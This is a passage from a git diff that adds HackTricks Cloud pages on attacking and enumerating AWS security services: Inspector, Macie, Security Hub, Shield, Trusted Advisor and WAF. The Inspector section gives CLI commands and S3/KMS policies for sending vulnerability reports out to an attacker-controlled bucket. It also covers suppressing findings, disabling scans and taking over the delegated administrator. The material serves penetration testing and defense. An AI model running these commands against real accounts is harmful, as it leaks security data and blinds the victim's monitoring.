+From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers.
+
+However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones).
+{% endhint %}
+
+#### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport`
+
+An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks.
+
+```bash
+# Findings report
+aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
+# SBOM report
+aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]
+```
+
+The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key:
+
+1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector:
+
+```json
+{
+	"Version": "2012-10-17",
+	"Statement": [
+		{
+			"Sid": "allow-inspector",
+			"Effect": "Allow",
+			"Principal": {
+				"Service": "inspector2.amazonaws.com"
+			},
+			"Action": [
+				"s3:PutObject",
+				"s3:PutObjectAcl",
+				"s3:AbortMultipartUpload"
+			],
+			"Resource": "arn:aws:s3:::inspector-findings/*",
+			"Condition": {
+				"StringEquals": {
+					"aws:SourceAccount": "<victim-account-id>"
+				},
+				"ArnLike": {
+					"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
+				}
+			}
+		}
+	]
+}
+```
+
+2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Id": "key-policy",
+    "Statement": [
+        {
+	    ...
+        },
+        {
+            "Sid": "Allow victim Amazon Inspector to use the key",
+            "Effect": "Allow",
+            "Principal": {
+                "Service": "inspector2.amazonaws.com"
+            },
+            "Action": [
+                "kms:Encrypt",
+                "kms:Decrypt",
+                "kms:ReEncrypt*",
+                "kms:GenerateDataKey*",
+                "kms:DescribeKey"
+            ],
+            "Resource": "*",
+            "Condition": {
+                "StringEquals": {
+                    "aws:SourceAccount": "<victim-account-id>"
+                }
+            }
+        }
+    ]
+}
+```
+
+3. Execute the command to **create the findings report** exfiltrating it:
+
+```bash
+aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
+```
+
+* **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses.
+
+#### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport`
+
+An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues.
+
+```bash
+# Cancel findings report generation
+aws inspector2 cancel-findings-report --report-id <value>
+# Cancel SBOM report generatiom
+aws inspector2 cancel-sbom-export --report-id <value>
+```
+
+* **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues.
+
+#### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter`
+
+An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response.
+
+```bash
+# Create
+aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
+# Update
+aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
+# Delete
+aws inspector2 delete-filter --arn <value>
+```
+
+* **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings.
+
+#### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`)
+
+An attacker could significantly disrupt the security management structure.
+
+* Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports.
+* Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities.
+
+{% hint style="warning" %}
+It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator.
+
+In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
+{% endhint %}
+
+```bash
+# Disable
+aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
+# Enable
+aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
+```
+
+* **Potential Impact**: Disruption of the security management.
+
+#### `inspector2:AssociateMember`, `inspector2:DisassociateMember`
+
+An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection.
+
+{% hint style="warning" %}
+This action requires to be performed by the delegated administrator.
+{% endhint %}
+
+```bash
+# Associate
+aws inspector2 associate-member --account-id <value>
+# Disassociate
+aws inspector2 disassociate-member --account-id <value>
+```
+
+* **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities.
+
+#### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`)
+
+An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations.
+
+{% hint style="warning" %}
+This action requires to be performed by the delegated administrator.
+{% endhint %}
+
+```bash
+# Disable
+aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
+# Enable
+aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
+```
+
+* **Potential Impact**: Creation of blind spots in the security monitoring.
+
+#### `inspector2:UpdateOrganizationConfiguration`
+
+An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts.
+
+{% hint style="warning" %}
+This action requires to be performed by the delegated administrator.
+{% endhint %}
+
+```bash
+aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
+```
+
+* **Potential Impact**: Alter security scan policies and configurations for the organization.
+
+#### `inspector2:TagResource`, `inspector2:UntagResource`
+
+An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity.
+
+```bash
+aws inspector2 tag-resource --resource-arn <value> --tags <value>
+aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
+```
+
+* **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation.
+
+## References
+
+* [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html)
+* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
new file mode 100644
index 0000000000..6667dcf6ba
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
@@ -0,0 +1,145 @@
+# AWS - Macie Enum
+
+## AWS - Macie Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Macie
+
+Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns.
+
+Key Features of Amazon Macie:
+
+1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account.
+2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks.
+3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time.
+4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings.
+5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks.
+
+Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality.
+
+### Alert System
+
+Macie categorizes alerts into predefined categories like:
+
+* Anonymized access
+* Data compliance
+* Credential Loss
+* Privilege escalation
+* Ransomware
+* Suspicious access, etc.
+
+These alerts provide detailed descriptions and result breakdowns for effective response and resolution.
+
+### Dashboard Features
+
+The dashboard categorizes data into various sections, including:
+
+* S3 Objects (by time range, ACL, PII)
+* High-risk CloudTrail events/users
+* Activity Locations
+* CloudTrail user identity types, and more.
+
+### User Categorization
+
+Users are classified into tiers based on the risk level of their API calls:
+
+* **Platinum**: High-risk API calls, often with admin privileges.
+* **Gold**: Infrastructure-related API calls.
+* **Silver**: Medium-risk API calls.
+* **Bronze**: Low-risk API calls.
+
+### Identity Types
+
+Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests.
+
+### Data Classification
+
+Data classification encompasses:
+
+* Content-Type: Based on detected content type.
+* File Extension: Based on file extension.
+* Theme: Categorized by keywords within files.
+* Regex: Categorized based on specific regex patterns.
+
+The highest risk among these categories determines the file's final risk level.
+
+### Research and Analysis
+
+Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring.
+
+### Enumeration
+
+```
+# Get buckets
+aws macie2 describe-buckets
+
+# Org config
+aws macie2 describe-organization-configuration
+
+# Get admin account (if any)
+aws macie2 get-administrator-account
+aws macie2 list-organization-admin-accounts # Run from the management account of the org
+
+# Get macie account members (run this form the admin account)
+aws macie2 list-members
+
+# Check if automated sensitive data discovey is enabled
+aws macie2 get-automated-discovery-configuration
+
+# Get findings
+aws macie2 list-findings
+aws macie2 get-findings --finding-ids <ids>
+aws macie2 list-findings-filters
+aws macie2 get -findings-filters --id <id>
+
+# Get allow lists
+aws macie2 list-allow-lists
+aws macie2 get-allow-list --id <id>
+
+# Get different info
+aws macie2 list-classification-jobs
+aws macie2 list-classification-scopes
+aws macie2 list-custom-data-identifiers
+```
+
+#### Post Exploitation
+
+{% hint style="success" %}
+From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\
+However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier.
+{% endhint %}
+
+TODO: PRs are welcome!
+
+## References
+
+* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
new file mode 100644
index 0000000000..ec054c188e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
@@ -0,0 +1,89 @@
+# AWS - Security Hub Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Security Hub
+
+**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues.
+
+It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts
+
+**Characteristics**
+
+* Regional (findings don't cross regions)
+* Multi-account support
+* Findings from:
+  * Guard Duty
+  * Config
+  * Inspector
+  * Macie
+  * third party
+  * self-generated against CIS standards
+
+## Enumeration
+
+```
+# Get basic info
+aws securityhub describe-hub
+
+# Get securityhub org config
+aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error
+
+# Get the configured admin for securityhub
+aws securityhub get-administrator-account
+aws securityhub get-master-account # Another way
+aws securityhub list-organization-admin-accounts # Another way
+
+# Get enabled standards
+aws securityhub get-enabled-standards
+
+# Get the findings
+aws securityhub get-findings
+
+# Get insights
+aws securityhub get-insights
+
+# Get Automation rules (must be from the admin account)
+aws securityhub list-automation-rules
+
+# Get members (must be from the admin account)
+aws securityhub list-members
+aws securityhub get-members --account-ids <acc-id>
+```
+
+## Bypass Detection
+
+TODO, PRs accepted
+
+## References
+
+* [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info)
+* [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
new file mode 100644
index 0000000000..b6ee0fa3ad
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
@@ -0,0 +1,41 @@
+# AWS - Shield Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Shield
+
+AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
+
+**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.
+
+**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
+
+Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
new file mode 100644
index 0000000000..518251fd64
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
@@ -0,0 +1,97 @@
+# AWS - Trusted Advisor Enum
+
+## AWS - Trusted Advisor Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS Trusted Advisor Overview
+
+Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories:
+
+1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses.
+2. **Performance:** Identifies potential performance bottlenecks.
+3. **Security:** Scans for vulnerabilities or weak security configurations.
+4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance.
+
+The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security.
+
+### Notifications and Data Refresh
+
+* Trusted Advisor can issue alerts.
+* Items can be excluded from its checks.
+* Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh.
+
+### **Checks Breakdown**
+
+#### CategoriesCore
+
+1. Cost Optimization
+2. Security
+3. Fault Tolerance
+4. Performance
+5. Service Limits
+6. S3 Bucket Permissions
+
+#### Core Checks
+
+Limited to users without business or enterprise support plans:
+
+1. Security Groups - Specific Ports Unrestricted
+2. IAM Use
+3. MFA on Root Account
+4. EBS Public Snapshots
+5. RDS Public Snapshots
+6. Service Limits
+
+#### Security Checks
+
+A list of checks primarily focusing on identifying and rectifying security threats:
+
+* Security group settings for high-risk ports
+* Security group unrestricted access
+* Open write/list access to S3 buckets
+* MFA enabled on root account
+* RDS security group permissiveness
+* CloudTrail usage
+* SPF records for Route 53 MX records
+* HTTPS configuration on ELBs
+* Security groups for ELBs
+* Certificate checks for CloudFront
+* IAM access key rotation (90 days)
+* Exposure of access keys (e.g., on GitHub)
+* Public visibility of EBS or RDS snapshots
+* Weak or absent IAM password policies
+
+AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices.
+
+## **References**
+
+* [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
new file mode 100644
index 0000000000..67086a9939
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
@@ -0,0 +1,501 @@
+# AWS - WAF Enum
+
+## AWS - WAF Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## AWS WAF
+
+AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules.
+
+### Key concepts
+
+#### Web ACL (Access Control List)
+
+A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions.
+
+#### Rule Group
+
+A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs.
+
